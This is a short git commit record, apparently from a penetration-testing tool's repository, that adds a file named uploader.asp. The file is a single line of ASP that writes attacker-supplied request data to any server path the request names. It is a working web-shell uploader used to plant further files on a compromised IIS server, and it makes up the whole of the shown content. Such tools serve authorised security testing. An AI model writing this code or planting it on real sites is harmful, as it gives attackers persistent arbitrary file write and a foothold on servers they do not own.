Added an ASP uploader

This commit is contained in:
Bernardo Damele 2009-01-10 14:40:04 +00:00
parent e10ab5aa0e
commit 9b0f11f879

1
shell/uploader.asp Normal file
View File

@ -0,0 +1 @@
<%set f = server.createobject("Scripting.FileSystemObject"):set o=f.OpenTextFile(Request("f"), 2, True):o.Write Request("d"):o.Close:set o=Nothing:set f=Nothing%>